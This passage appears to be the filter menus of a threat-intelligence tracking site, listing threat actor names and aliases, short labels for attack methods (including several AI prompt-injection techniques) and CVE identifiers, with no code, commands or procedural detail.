from "Scattered Spider", "ShinyHunters", and "Lapsus" Telegram channel Third Party Data Transfer Threat actor modifying Zscaler binaries Threat actors behind Likejack campaign Transnational inheritance scam group in Côte d’Ivoire Trump Administration UAT-5918 UAT-7237 UK Home Office UNC5221 UNC5518 UNC5774 UNC6040 UNC6384 UNC6395 Unidentified Sitecore Attacker Unintentional insiders Unspecified Attacker USSR Vitaly Nikolaevich Kovalev Volt Typhoon Warlock WarLock Warlock Group Warlock Ransomware Gang Warlock ransomware group Weight-loss Scammers ZombAIs
Actor Aliases All @qwerty @v4bel 0ktapus 7777 Agenda AguilaCiega ak47c2 ak47dns ak47http Akira Anthony Ramirez APT-C-36 APT-Q-98 APT43 AsyncRAT Beijing Berserk Bear Bitcoin Trader Black Lock Blacklock Blind Eagle Blue Kraken Bossnet Broomstick/Oyster Burunduki Cl0p Claude Code ClickFix Contagious Interview cluster ContagiousDrop applications Conti spin-off CowBot Cozy Bear CP3O CP3O LLC Crouching Yeti cryptohan Cyber Av3ngers data thieves Digital defenders of Pakistan Dragonfly EDRKillShifter El Dorado Eleven Eleven Botnet Elijah Energetic Bear Facebook FakeUpdates FBR FinFisher Flax Typhoon Flyservers S.A. FreeVPN.one GFW GhostWriter Global Group government goons Graphite GrayAlpha Great Firewall of China Gustavo Fring Haise Immediate Mator IntelBroker IsDLEnabledinAD Jodie JPush Kaleidoscope KaWaLocker King Bob Koala Team Lalartu LameHug Lampion Latrodectus Lumma Stealer LunaSpy Matryoshka MedusaLocker Midnight Blizzard MintsLoader Muddled Libra MultiMillionaire LLC Murky Panda Mustang Panda MysterySnail RAT NetSupport NEW VISION MARKETING LLC Nova Orange Perplexity-User PerplexityBot Pompompurin PRC PyNightshade Qilin ransomware gang Quantum Bumex R-FBI Rabotnik Ramp cybercrime forum account ransomware gang Rapper Bot RapperBot RealBlindingEDR Redline/Meta Stealer remi Royal Russian Federal Security Service’s (FSB) Center 16 unit Russian hackers Scatter Swine Scattered Lapsus$ Hunters Scattered Spider ScatteredLapsuSp1d3rHunters SectopRAT ShinyHunters Silk Typhoon Slaykings SocGholish malware Sosa SoundBill SparkCat Spider Team Static Tundra Storm-0978 Storm-1679 Storm-2603 TheTruthSpy Third Party Attacker Tropical Scorpius Trump admin UAC-0057 UNC2596 UNC3944 UNC6395 Universal Mining UNK_GreenSec UNKN ValleyRAT Volt Typhoon Winos World Leaks XORacle Xworm Yemen Cyber Army Zephyr Zunput
Exploit Method All .ICS-based calendar phishing 5G to 4G Downgrade Attack ABAP Code Injection ABAP_Code_Injection_via_RFC ABF_Heap_Overflow ABF_Heap_Overflow_2 Abuse of Android Permissions for Data Exfiltration and Control Abuse of Censys Research Program to Identify Vulnerable Systems Abuse of gpscript.exe Abuse of HRSword Abuse of Legitimate Internet Services (LIS) for Staging Abuse of Legitimate Tools (Velociraptor, Visual Studio Code) for Remote Access Abuse of Remote Access Tools (AnyDesk, TightVNC, RDP Wrapper) Abuse of Velociraptor Incident Response Tool for Remote Access Accidental Data Deletion via Third-Party Access Accidental Data Exposure via Search Engine Indexing Account Compromise via Stolen Credentials Account Hijacking via Telegram Premium Gift Scam Account Password Reset Account Takeover Account Takeover via Stolen Credentials Admin Panel Access and Data Exfiltration ADP Region Bypass Adversarial Reward Hacking Adversary-in-the-Middle (AitM) Attack AF_VSOCK UAF exploit (CVE-2024-50264) AF_VSOCK Use-After-Free Exploit Agent Memory Poisoning AgentHopper AI Agent Credential Exposure AI Agent Privileged Data Access AI Agent Vulnerability AI Browser Prompt Injection AI ClickFix AI Crawler Overload AI Girlfriend Data Theft AI Kill Chain AI Model Hallucination Leading to Incorrect Employee Mapping AI Poisoning (LLM Grooming) AI-Assisted Data Extortion AI-assisted Reconnaissance and Target Selection AI-assisted Vibe Hacking AI-Augmented Mutational Fuzzing AI-based Age Detection for Data Collection AI-Driven Exploitation AI-Enhanced Attack Automation AI-enhanced Malware Development AI-Fueled Data Exfiltration via Automated Agents AI-powered Phishing and Social Engineering AI-Powered Ransomware (PromptLock) AI-Powered Ransomware Generation (Ransomware 3.0) AI-Powered Real-time Threat Detection Circumvented by Adding Cyber Later Airtel Router Default Password Exploitation Allianz Life Customer Info Breach Alone Theme Webshell Upload AMOS Infostealer Installation via Terminal Command AMOS Persistence Mechanism via LaunchDaemon Amplification of Unconfirmed Cyberattack Claims and Deprecated API Exploitation and Registry/Disk Search Android VPN App Security Flaws and China Links Anonymity Exploitation for Malware Distribution and Financial Fraud ANSI Escape Code Injection Anti-Competitive Ad Practices/Self-Preferencing API-Targeted Attacks Apple ID Scam Leading to Theft APT31 Campaign Arbitrary Code Execution via Indirect Prompt Injection by Adding Malicious MCP Servers Arbitrary Code Execution via Indirect Prompt Injection by Allowlisting Bash Commands Arbitrary Code Execution via Prompt Injection with 'find -exec' Arbitrary Command Execution via Allowlisted Commands Arbitrary Command Execution via Malicious MCP Server Addition Arbitrary File Write via Hard Link and Symlink Arbitrary Firmware Flashing via Web Portal Arbitrary Free via Forged Session ASP.NET Machine Key Deserialization RCE Authenticated Remote Code Execution via SharePoint Automated CVE-2018-0171 Exploitation Automated Dependency Updates Automated Negotiation Automatic Tool Invocation via Prompt Injection AV-killer malware abusing ThrottleStop.sys AVideo_Race_Condition_and_Blacklist_Chain AWS Trusted Advisor Flaw Backdoor Backdoor Creation Backdoor Injection and Model Poisoning BadBazaar BadCam BadPotato BadUSB Baltimore Procurement Scam Beyond Compare Clipboard Injection BitChat Vulnerabilities BlackCat Ransomware Blind In/On-Path Attack Blind Signing Blind-signing risks Blocking Rival Advertising Companies Bomb Threats & Swatting Broken Windows Reset/Recovery Brushing Scam Brushing Scam leading to data exfiltration/malware installation Brute Force Activity BruteForceAI Business Email Compromise (BEC) Business Logic Abuse (BOLA) Business Logic Flaws in Referral Rewards Programs Bybit Hack - Compromised Supply Chain & Unverified Signatures Leading to Delegate Call Manipulation BYOVD (Bring Your Own Vulnerable Driver) BYOVD_Arbitrary_Process_Termination Bypassing Gatekeeper via Terminal-Based Installation Bypassing_Windows_Hello_Fingerprint_Login C# Random Number Generator Integer Underflow C# Random Number Generator Predictability C4 (Chrome Cookie Cipher Cracker) Cable-cutting techniques (anchor dragging) Caller ID Spoofing by Overseas Robocallers Car Unlocking Exploit Chained RCE (E3) Check Kiting/Tap-In Scam Circumventing Antitrust Regulations Cisco Bug Exploitation Citrix Vulnerability Exploitation Claude AI Chatbot Cybercrime Cleartext Authentication Exploit ClickFix ClickFix Phishing ClickFix Social Engineering Clickjacking Client-side blind in/on-path attacks for connection inference Client-Side Path Traversal (CSPT) Leading to XSS or CSRF Client-Side Posture Check Bypass via Binary Patching Clipboard Address Replacement Clipboard Address Swapping via Malware (Efimer) Cloud Misconfiguration Exploitation Cloud Resource Abuse for Cryptojacking Cloud Trusted-Relationship Compromise CM/ECF Cyberattack Cobalt_Strike_Post_Exploitation Colonial Pipeline Hack COM Hijacking via Registry Key Command Injection in SynologyPhotos Command Injection via Improper Sanitization Command Line Obfuscation Compromise M-of-N multisig keys Compromised Certificate Usage Compromised CI/CD Pipelines Compromised Delegated Administrative Privileges (DAP) Compromised Employee Accounts Compromised Nx Package Maintainer Token Compromised OAuth Token Exploitation Compromised Passwords Compromised SaaS Application Registration Secret Compromised Third-Party Applications Compromising Smartphones for User Data Configuration File Manipulation for Unauthorized Access Configuration File Modification for Unauthorized Access Conflicting Privileges/Separation of Duties Violation Confusing Firewall Management ConnectWise Server Vulnerability Context Poisoning (Echo Chamber technique) Control Plane Disruption Leading to Security Enforcement Failure Cookie Injection leading to Cookie Tossing Cookie Misuse and Non-Compliance Copilot Agent Prompt Injection via GitHub Issues Copyright Infringement for Illicit Streaming CORS Bypass via Simple Request Manipulation CosMc's Promotional Coupon Exploit Covert Command & Control via Web Conferencing Traffic Cozy Bear's use of NSO Group and others' surveillanceware flaws Cracked Remote Access Trojans (RATs) Credential Abuse Credential Dumping Credential Dumping via Mimikatz Credential Extraction via Mimikatz Credential Harvesting & Data Theft Credential Harvesting from Exfiltrated Data Credential Phishing via Impersonation Credential Pointer Overwrite Attacks Credential Scanning Post Data Exfiltration Credential Stealing with AI Assistance Credential Stuffing via Bots Credential Stuffing/Compromise Credential Stuffing/Reused Credentials Credential Theft leading to Document Access Credential Theft via Mimikatz Cross-Server Manipulation (Confused Deputy) Cross-Server Tool Shadowing Cross-site request forgery (CSRF/XSRF) Cross-site scripting (XSS) Cross-Site Scripting (XSS) for Auth Token Acquisition Cryptocurrency Mining Centers (Illicit) Cryptocurrency Mining Exploitation Cryptocurrency Scam Recovery Fraud Cryptocurrency Wallet Seed Phrase Phishing Custom Code Injection/Tech Debt in Legacy IGA CVE-2025-57789 and CVE-2025-57790 CWE Exploitation Cyber Privateers Cyberattacks on critical systems impacting US military operations Cyberbullying Cycle Exploitation Danabot DarkLnk Data Access via Government Request (Cloud Act) Data Access via Investment Data Breach Data Breach of Order Management System Data Breach Through Mishandled User Data Data Breach/Leak Data Breaches of Stored Information Data Broker Breach Leading to Identity Theft Data Collection and Potential Misuse Data Collection for Targeted Advertising via Browser Ownership Data Collection of Underage YouTube Users Data Corruption/SSD Failure Data Deletion Data Deletion and Privilege Escalation Attempts Data Exfiltration Data Exfiltration and Auction Data Exfiltration and System Downtime Data Exfiltration from iiNet Order Creation and Tracking System Data Exfiltration via `read_url_content` Tool Data Exfiltration via Browsing Tool Data Exfiltration via Browsing Untrusted Domains Data Exfiltration via Image Rendering Data Exfiltration via Markdown Image Rendering Data Exfiltration via Mermaid Diagrams Data Exfiltration via SOQL Queries Data Exposure due to Misconfiguration Data Exposure via Unauthenticated API Access Data Extortion Data Injection Attacks Data Leakage Data Leakage via Prompt Injection and Shared Trust Boundary Data Leakage via Shadow AI Data Overload and Latency Exploitation Data Scraping for AI Training Data Set Manipulation via Face Morphing Data Sharing with Third Parties Data Sovereignty and Potential Breaches Data Theft leading to Phishing/Fraud Data Theft via Canadian House of Commons Breach Data Transfer Commands for Exfiltration Data_Sharing_Vulnerability_Through_Public_Services_Team DataExfiltration DDoS Attacks Enabled by Stark Industries Infrastructure DDoS Botnet leveraging compromised IoT devices Decoy Domain Detection Deepfake Nudes Deepfake Social Engineering Deepfake-Based BEC Deepfake-Enabled Social Engineering for Investment Fraud Deepfakes and Spoofing Age Verification Systems Deepfakes for Disinformation Delivery of Malicious ZIP Archive via Herokuapp DELMIA Apriso Deserialization Exploit Demographic Bias in Facial Recognition Deserialization of Untrusted Input leading to Arbitrary Code Execution Destination Hijacking and Storage Limit Oracle Side-Channel Attack Directory Access Bypass via Improper Path Validation Dirty Pipe exploit Dirty Pipe Exploit (CVE-2022-0847) adaptation for CVE-2024-50264 Distributed Denial of Service (DDoS) Attack DLL Hijacking DLL Search Order Hijacking DLL Side-Loading DNS Data Exfiltration via Prompt Injection DNS Hijacking DNS PTR Record Hijacking DNS Tunneling Domain Generation Algorithms (DGA) Downgrade Attack Doxing Doxing and Harassment of Election Officials Doxing and Stalking DripDropper Malware Deployment Drive-by Download via AI Manipulation Dumping unfiltered streams leading to errors Eavesdropping and Recording of Conversations Echo Chamber with Narrative Steering EchoLeak ECScape: ECS Task Credential Theft via ECS Agent Impersonation EDR Killer Tool EDRKillShifter and Vulnerable Driver Exploitation (BYOVD) Efimer WordPress Password Cracking EfsPotato EfsPotato and BadPotato EfsPotato/BadPotato Elasticsearch Instance Reconnaissance Email Spoofing Emergency_Access_Authentication_Bypass EMF_Out_of_Bounds_Read Emotional Dependency Entra OAuth Misconfiguration for Internal Microsoft Application Access Equation Editor Exploit ERMAC_v3_Source_Code_Leak Erosion of Cybersecurity Expertise at the State Department Evasive Trade Patterns and Shell Companies Excessive Permissions and Dormant Accounts of Machine Identities Execute PE From PNG Via LNK Execution of Arbitrary Commands and Code via WMI Tooling Exfiltrating Stored User Memories via Prompt Injection Exploitation of Bugs Dating Back to 2020 Exploitation of known vulnerabilities for initial access Exploitation of Public Wi-Fi Exploiting Known Vulnerabilities for Initial Access Exploiting known vulnerabilities on unpatched servers Exploiting Outdated Software Exposed High Voltage Components Exposed_Infrastructure_Abuse Exposure of Secrets via Public Repositories Extended Security Updates Costs Face Morphing Identity Fraud Facebook Likejacking via Trojan.JS.Likejack Facial Recognition Misidentification due to Low Image Quality Facial_Recognition_Scan_of_Passport_and_Immigration_Databases Fake Cryptocurrency Investments Fake Tesla Website Credit Card Theft FakeCaptcha Faulty OAuth Implementation in Staff Portals Feel-Good Design Hub Account Creation Exploit find -exec Arbitrary Command Execution Forged Documents for Disinformation Fortinet SSL VPN Brute-Force Free Food Exploit FreePBX Remote Code Execution Fuzzing for Memory Errors GDI+ Metafile Attack (CVE-2025-53766) Geolocation Tracking via Third-Party SDK GitHub Account Compromise GitHub Actions Workflow Code Injection Global Restaurant Standards Portal Admin Authorization Exploit Google Classroom Phishing Campaign GoPhish_Phishing GPS Jamming GPS Spoofing Gravity Forms Malware Injection Grok Conversation Exposure via Search Engines Grooming in Online Games GTM Container Chaining for E-skimming GUI Port Scanning and Configuration Hijacking Gzip Reverse Shell Hard-coded Shadowsocks Password Decryption Hard-coded Shadowsocks password leading to traffic decryption Hardcoded AES Key for Password Reset Harmful content Harvesting Credentials via Snooping Software Hashtag Hijacking Heap Corruption/Use-After-Free via Arbitrary Free Heap_Corruption_via_Forged_Session_Object Heap-based Buffer Overflow in Nex Parsing HexStrike AI Assisted Exploit Generation for NetScaler Vulnerabilities Hidden Personal Data in Spreadsheets HMRC Impersonation and Phishing for Identity Theft Hotel Booking System Infiltration and Data Theft HTTP Chunked Encoding Stack Overflow HTTP Chunked Transfer Encoding Memory Corruption in NVIDIA Triton HTTP Host Header Authentication Bypass HTTP Request Smuggling via Chunk Extension Parsing HTTP Request Smuggling via HTTP/1.1 Desync HTTP/2 Rapid Reset Hyper-V Certificate Spoofing (CVE-2025-49707) Hyper-V VM Escape (CVE-2025-48807) iCloud Calendar Invite Phishing iCloud Calendar Phishing Image Scaling Attack for Multi-Modal Prompt Injection Image Scaling Attack Leading to Indirect Prompt Injection Image-Based Device Hijacking Impersonation-as-a-Service Incompatibility across integrated systems Incorrect array index bounds check via KUBSAN Increased Foreign Surveillance Indirect Prompt Injection leading to Data Exfiltration via Shell Tool Indirect Prompt Injection Leading to Devbox Compromise Indirect Prompt Injection Leading to Port Exposure Indirect Prompt Injection leading to Remote Code Execution Information Hoarding Infrastructure Scouting and OPSEC Failures Inheritance Scam Inheritance Scams Initial Intrusion Insecure AWS Bucket Access Insecure Cross-Site Worklet Code Leaking Shared Storage Data Insecure Deserialization for Command Execution Insecure_C2_Infrastructure Insecure-by-Design Notification System Insider Sabotage via Code Modification Insider Threats Integer Overflow in FTS5 Extension integer overflows via ACL Integer Truncation Leading to Heap-Buffer-Overflow Intent Redirection Interlock Ransomware Attack Internet-Facing Appliance Exploitation Invisible Unicode Tag Character Prompt Injection Invisible Unicode Tag Prompt Injection Invisible_Prompt_Injection_via_Unicode_Tag_Characters Jailbreaking and Content Abuse Jenkins Git Parameter Plugin Command Injection JPEG Image Attack (CVE-2025-50165) JPEG Image Processing Attack JPEG2000 cdef atom Overflow JSCEAL JuicyPotato Privilege Escalation JWT Leakage to User-Built Apps Kaleidoscope Ad Fraud Campaign Kaseya Supply Chain Attack Kawa4096 Ransomware Arbitrary Command Execution Kawa4096 Ransomware Data Deletion Kerberoasting Kill Switch Kill Switch via Active Directory Account Disablement Kimsuky APT Group using Spear-phishing L1TF Reloaded Lack of AI Usage Policies and Training Lack of Controls Over Downloads Lack of Multi-Factor Authentication (MFA) Lack_of_MFA_Pre_Enforcement LameHug Lateral Movement to Other Dealer Systems Lateral Movement via RDP using SoftEther VPN client Lazarus APT Watering Hole Attack Lazarus APT Watering Hole Attacks on South Korean Software Leaky Debugging Reports Bypassing Referrer-Policy and CSP Legal Uncertainty Leading to Reduced Threat Information Sharing LegalPwn Lethal Trifecta Exploitation Librarian Ghouls APT Malicious RAR Archives and BAT Scripts Librarian Ghouls APT RAR and BAT script attack Limited Targeted Exploitation of CVE-2025-38352 and CVE-2025-48543 Linux Malware Delivery via Spam Email LLM Answer Manipulation LLM Data Theft via Malicious Prompts Location Data Aggregation and Sale Location Tracking by Untrusted Contacts Login Bypass and Privilege Escalation LummaC2 Infostealer LummaStealer LZ1 vulnerability M365 Copilot File Access Without Audit Logs M365 Copilot Jailbreak via Caret Characters MadeYouReset MagicBell API Key Exposure Mailchimp Phishing for Subscriber Data Theft Mains Voltage Leakage Malicious App Distribution via Google Play Malicious Archive Exploitation Malicious Browser Extension as Spyware Malicious GitHub Repositories Malicious Image Processing for Memory Corruption Malicious Java Thread Exhaustion Malicious Java Thread Loop Malicious OAuth App Connection Malicious OAuth Application Infiltration Malicious Post-Installation Script (telemetry.js) Malicious PowerShell Script with Base64 Encoding Malicious Tool Injection Malicious USB Drives (Hardware Wallet Seed Phrase Theft) Malvertising campaign Malvertising Campaign Distributing Trojanized PuTTY Malware Detection using YARA Malware-laced Recruitment Lures (Contagious Interview Campaign) Man-in-the-Middle Attack Man-in-the-Middle Phishing for MFA Tokens Manual Package Dependency Manipulation Markdown Image Rendering Data Exfiltration Marshal Deserialization Exploit in Rails Controller MAS Hijacking Mass Internet Scanning MCPoison Memory or Credential Dumping Meta AI Conversation Exposure Metasploit_Exploitation MFA Bombing MFA Fatigue Attack Microsoft SharePoint 'ToolShell' vulnerability exploit chain Microsoft SRS Abuse Mirai-based DDoS Botnet Misconfigurations Misconfigured Security Tools Misidentification and False Accusations via Facial Recognition Misuse of Vulnerability Disclosure MixShell Custom In-Memory Implant Model Extraction Attacks Money Muling Money Muling via Social Media Motors Theme Admin Account Hijacking MOVEit Transfer mass exploitation by Clop ransomware MSMQ Packet Attack (CVE-2025-50177) NDI Streaming Performance Degradation Network Service Discovery NFC Relay Fraud (via SuperCard X) No-Code Automation Platforms for BEC NodeSnake Remote Access Trojan Nomani Trojan Campaign NPM Package Infostealer NPM Supply Chain Attack via GitHub Actions Workflow NULL_Pointer_Dereference_in_elastic-endpoint-driver.sys NVIDIA Triton Unauthenticated Takeover OAuth Account Takeover via URL Leak OAuth Credential Theft and Abuse OAuth Token Theft OAuth Token Theft via Salesloft Drift Integration OAuth Token Theft/Abuse Obfuscation of Cryptocurrency Transactions OCI Image Archive Bomb Office Preview Pane RCE Olivia AI Chatbot Default Password Exploit Online Scams Online Scams (Investment Fraud) Open Directory Listing Open Redirect Leading to Account Takeover Out-of-bounds Read in EMF Processing Out-of-bounds Write via Crafted ControlVault API Call Overreliance on Vendors and Frameworks Packet Injection Parallel Poisoned Web Attack Parsing Untrusted Files Patch_Bypass_via_Signature_Manipulation Path Traversal PayPal Account Secondary User Addition Penetration Testing PerfektBlue Bluetooth Attack Phishing Phishing and Online Dating Scams Phishing and Social Engineering Phishing and Social Engineering using Generative AI Phishing Attack via Unfiltered Links Phishing Campaign Targeting UK Home Office SMS Phishing Campaign with MostereRAT Phishing Email Attachment Phishing for Device Codes Phishing Link Click Phishing via Mailto Links Phishing via Netflix Impersonation Phishing via SMS (Smishing) Phishing via Telegraph Tool Phishing-as-a-Service via Telegram Bots Physical Access Bypass of Windows Login Physical Access to Voting Machines Poisoned Web Pages Targeting AI Agents Poorly Configured Cloud Services Post-Compromise Persistence via Firmware Implant Post-Exploitation Patching PostgreSQL Database Corruption Potential Admin Panel Access Potential Backdoors PowerSchool Credential Interception PowerShell 2.0 Dependency PowerShell Invoke-Expression (IEX) abuse Powershell Script Execution from Non-Standard Directory Predictable Session IDs Prison visitor details shared with all inmates at correctional facility Privacy Issues Privilege Escalation Attempt Privilege Escalation using JuicyPotato Privilege Escalation via JuicyPotato Privilege Escalation via TrustedInstaller Mimicry Prompt Injection Prompt Injection for Data Harvesting Prompt Injection for Ransomware Assistance Prompt Injection Leading to Data Exfiltration via Image Rendering Prompt Injection leading to Data Theft Prompt Injection leading to DNS Exfiltration Prompt Injection leading to RCE via Settings Modification Prompt Injection leading to Remote Code Execution Prompt Injection Leading to Remote Command & Control Prompt Injection via Image Rendering for Data Exfiltration Prompt Injection via Tool Definitions Prompt Injection via url_safe bypass Prompt Injection/Egress Control Vulnerability in AI-Assisted Training Tools PromptFix Qilin Fortinet Vulnerability Exploitation Qilin Ransomware QR Code Phishing/Malware Distribution QR Code Scams Quad7 Botnet Quantum Computer Encryption Breaking QUIC-LEAK Pre-Handshake Memory Exhaustion Quishing (QR Phishing) Race Condition Exploitation via Single-Packet Attack RADIUS Authentication Command Injection (CVE-2025-20265) RAID Failure leading to Data Loss RAM Disk Buffer Overflow via HTTP PUT Request RansomHub Ransomware Ransomware Ransomware and Data Exfiltration Ransomware attack Ransomware Attack Ransomware Attack (Qilin) Ransomware Attack on Payment Processing Systems Ransomware Attack with LockBit and Babuk Variants Ransomware Deployment and Extortion Ransomware Deployment via SharePoint Vulnerability Ransomware Deployment via SonicWall Firewall Exploitation Ransomware Enabled by Cryptocurrency Exchange Ransomware Extortion of Downstream Customers Ransomware Targeting Git Repositories via Exposed Credentials RansomwareAttack Rapper Bot DDoS Attack Rapper Bot DDoS Botnet RCE via Crafted Metafile in GDI+ RCE via Malicious JPEG in Office Document RDP Exposure RDP Phishing RealBlindingEDR Customization and Abuse Rebranding and Infrastructure Reallocation to Evade Sanctions Red Teaming Evasion (prompt injection) Redline/Meta Stealer Referral Hijacking via Cookie Fixation Registry Run Key Persistence Remote Access Software Abuse Remote Code Execution via Prompt Injection and Chained Commands Remote Code Execution via SSH Command Injection Remote Kill Switch Remote Services (RDP, PsExec, PowerShell) Repository Credential Leakage via Project Details API Retbleed ReVault Exploit Revenge Porn RID Hijacking RobbinHood Ransomware Robot Control System Takeover Robots.txt Bypass via User-Agent Spoofing and IP Rotation robots.txt directive bypass Rogue Rogue Admin Account Creation Romance Scams and Business Email Compromises (BEC) Rootkit Detection Ruby Marshal Deserialization Exploits RustyClaw Downloader Execution SaaS Account Compromise via VPS SaaS Provider Account Takeover via CDK Bootstrap Roles Salesforce CRM OAuth Token Compromise Salesloft Drift Breach SAP NetWeaver Mass Exploitation Scam E-commerce Purchase Scams and Fraud via WhatsApp Screenshot Exfiltration Secure Call Fuzzing via SkBridge Secure Kernel Crash on Invalid Secure Call Operation Self-XSS via Disk Cache SEO Poisoning for LLMs SEO Poisoning/Click Reduction via AI Summarization Session Hijacking Session Hijacking via Session Sniffing Sextortion SHA-1 Collision Attack Shadow SharePoint Vulnerability Exploitation SharePoint Zero-Day Attack Spree SharePoint Zero-Day Exploits (July 2023) Shell on a system with command execution ShinyHunters Salesforce Attack Sideloaded Malware Distribution Silent Tool Redefinition Silver Fox APT Abusing Kernel Drivers SIM Swapping SimpleHelp Remote Administration Tool Attacks SimpleHelp Zero-Day RCE Sleepwalk Sliver_Post_Exploitation Smart Install Exploitation (CVE-2018-0171) Smart Install Message Crafted Attack SMS Bombing SMS Phishing SMS_Scams_via_Sentiment_and_Requests SMS_Scams_via_URL_Shorteners SNI5GECT Sniffing Attack SnipBot Variant Execution with Registry Check SNMP Exploitation in End-of-Life Devices Social Engineering Social Engineering (Vishing) Social Engineering and Grooming of Children Social Engineering and Redirection to Malicious Domains Social Engineering for Money Muling Social Engineering leading to Account Takeover and Data Theft Social Engineering of Salesforce Users via Malicious OAuth Apps Social Engineering Scams Social Engineering via AI Mimicry Social Engineering via AI Phishing Social Engineering via Contact Form Social Engineering via Hyperlinks and Invisible Unicode Characters Social Engineering via Messenger for Malware Distribution Social Engineering via SMS Phishing and In-Person Collection Social Engineering/Misinformation Campaign Social Media Phishing via Deepfakes and Impersonation Social Media Scams SoftEther_Proxy Software Supply Chain Attacks SpAIware Exploit SpAIware_Windsurf_Cascade Spearphishing with compromised email accounts Spearphishing with LNK file and PowerShell to deliver XenoRAT Speculative ROP SQL Injection SQL Injection & Rogue Admin User Creation SSH Exposure sshd Configuration Modification for Root Login SSL VPN MFA Bypass/Credential Theft ssp_dump_lsass Stack_Overflow_in_securebio_identify Stack-Based Buffer Overflow in MFER Parsing Stalkerware Data Exposure Stalking Startup Application Overload Static Tundra APT Group Exploiting Cisco IOS Stealing Developer Secrets via Prompt Injection and Grep Steganography to Embed Payloads in Image Files Stolen Account Credentials Stolen Credentials leading to Data Breach Stolen Credentials leading to Salesforce Data Breach Stored XSS on app.base44.com Leading to Account Takeover Subscription Traps Supply Chain Attack Supply Chain Attack (SolarWinds) Supply Chain Attack via Compromised GitHub Action Workflow Supply Chain Attack via Compromised npm Package Supply Chain Attacks Supply Chain Compromise Supply chain compromise of multisig provider Supply Chain Compromises Supply Chain Infiltration/Trade Secret Theft/Sabotage SVG Image with Embedded Javascript Execution SVG Phishing Campaign Delivering Malware SYNful Knock SYNful Knock Firmware Implant System Instability Post Windows 11 Migration SYSTEM_Privilege_Escalation_via_Firmware_Modification TarFile.extractall()/extract() filter bypass via hard link manipulation Targeted Assassination via Publicly Available Data TCP RST+ACK Packet Injection Tea Dating App Private Message Disclosure Telecom Infrastructure Compromise via Widespread Vulnerabilities Third-Party Application Exploitation Third-Party Data Breach Third-Party Integration Vulnerability (Salesloft/Drift Breach) Third-Party Service Access via Connectors Third-party Software Package Compromise Third-Party Vendor Exploitation Threatening Communication Timed Clickjacking Exploit Tizen OS Vulnerabilities tj-actions/changed-files Supply Chain Breach TLS Downgrade via STARTTLS Token Theft Tool Poisoning via Hidden Instructions in Tool Descriptions ToolShell Exploit Chain (SharePoint Servers) TP-Link Botnet Infection Trade-Based Money Laundering Traffic Distribution System (TDS) Misuse Transient execution vulnerability Trolling Trusted Advisor Bypass via Policy Manipulation Tuya App Notification Exploit TypeLib Hijacking Persistence Technique Typosquatting/Tool Impersonation Unauthenticated File Operations (E2) Unauthenticated RCE via CVE-2025-57788 Unauthenticated RCE via CVE-2025-57791 and CVE-2025-57790 Unauthenticated Remote Code Execution via Metadata Uploader Endpoint Unauthenticated Remote Command Injection Unauthenticated Server-Side Template Injection Unauthorized Malicious Activity Unauthorized Model Access and Resource Exhaustion Unauthorized Network Access Uninitialized function pointer call in JPEG decoding Uninitialized Pointer Memory Corruption via Malicious PDF Unintentional Data Exposure Through Shared Chats Unintentional Insider Data Leakage via Public AI Tools Universal RCE Deserialization Gadget Chain Unoptimized Code Flow Causing Connection Error Unpatched data accessibility flaw Unpatched OS Vulnerability Exploitation Unreliable Network Share Backup Unsecured Public Wi-Fi Unspecified Cyber Incident URL Anchor Hijacking USB-based Malware Distribution Use of customized shellcode loader SoundBill Use of Generative AI for Disinformation Use of Remote Access Software User-Agent Spoofing UXSS via redirectUrl parameter in GX.games V8 Heap Snapshot Backdoor Valid Code Signing Certificate Abuse VBScript obfuscation in Javascript view_text_website Tool Data Exfiltration ViewState Deserialization ViewState Deserialization Attack ViewState Deserialization via Exposed Machine Key VIN-Based Account Takeover and Remote Vehicle Control Violation of Cookie Regulations and Unconsented Ad Display Violence and Fraud via Telegram VIPKeylogger Voice Phishing Vulnerability Scanning for Exploitation Watering Hole Attack Weakening Encryption Web Application Attacks Web Defacement Web Desync Attacks Webshell Implant Webshell implantation on SharePoint servers Website Defacement WhatsApp Targeted Attack Windows 10 End-of-Life Migration Windows Administrator Password Cracking Windows CLFS Vulnerability Exploitation Windows Update Failure from Network Share WinRAR ADS Path Traversal WinRAR Path Traversal Exploit via Malicious Archives WinRAR vulnerability exploitation WordPress Website Compromise Wrong Recipient Email WSUS Update Failure XSS via file:// URL and SpectreJS XZ-Utils Backdoor YouTube Impersonation for Channel Takeover YubiKey Cloning Zelle Fraud Due to Insufficient Security Measures Zero-Click Attack via Chained Vulnerabilities Zero-Click Image Processing Zero-Click WhatsApp Exploit Zero-day exploitation Zero-Day Exploitation Zero-Day Vulnerability Exploitation Zero-day vulnerability exploitation by surveillanceware vendors ZipLine Phishing Campaign ZombAI Zombie
Vulnerabilities All CVD-2024-0096 CVE-2017-11882 CVE-2018-0171 CVE-2018-20835 CVE-2019-5420 CVE-2021-26708 CVE-2022-3875 CVE-2022-3876 CVE-2023-3519 CVE-2023-36884 CVE-2023-46604 CVE-2023-48788 CVE-2023-50224 CVE-2023-NNNNN CVE-2024-12905 CVE-2024-2088 CVE-2024-23692 CVE-2024-26980 CVE-2024-3094 CVE-2024-34102 CVE-2024-38196 CVE-2024-39337 CVE-2024-40766 CVE-2024-45431 CVE-2024-45432 CVE-2024-45433 CVE-2024-45434 CVE-2024-47575 CVE-2024-49039 CVE-2024-50264 CVE-2024-50283 CVE-2024-50285 CVE-2024-50286 CVE-2024-50623 CVE-2024-55956 CVE-2024-9680 CVE-2025-0282 CVE-2025-053 CVE-2025-20265 CVE-2025-20281 CVE-2025-20282 CVE-2025-20337 CVE-2025-21450 CVE-2025-21479 CVE-2025-21483 CVE-2025-21944 CVE-2025-21945 CVE-2025-21946 CVE-2025-21947 CVE-2025-21955 CVE-2025-21967 CVE-2025-22038 CVE-2025-22039 CVE-2025-22041 CVE-2025-22042 CVE-2025-22043 CVE-2025-22074 CVE-2025-22457 CVE-2025-23310 CVE-2025-23311 CVE-2025-24000 CVE-2025-24204 CVE-2025-24311 CVE-2025-24322 CVE-2025-24485 CVE-2025-24496 CVE-2025-24813 CVE-2025-24919 CVE-2025-24922 CVE-2025-25050 CVE-2025-25214 CVE-2025-25215 CVE-2025-25256 CVE-2025-26469 CVE-2025-27034 CVE-2025-27129 CVE-2025-27564 CVE-2025-27724 CVE-2025-27931 CVE-2025-30256 CVE-2025-30388 CVE-2025-31143 CVE-2025-31324 CVE-2025-31355 CVE-2025-31646 CVE-2025-32010 CVE-2025-32433 CVE-2025-32451 CVE-2025-32468 CVE-2025-32731 CVE-2025-35984 CVE-2025-36548 CVE-2025-37775 CVE-2025-37776 CVE-2025-37777 CVE-2025-37926 CVE-2025-37947 CVE-2025-37956 CVE-2025-38352 CVE-2025-3928 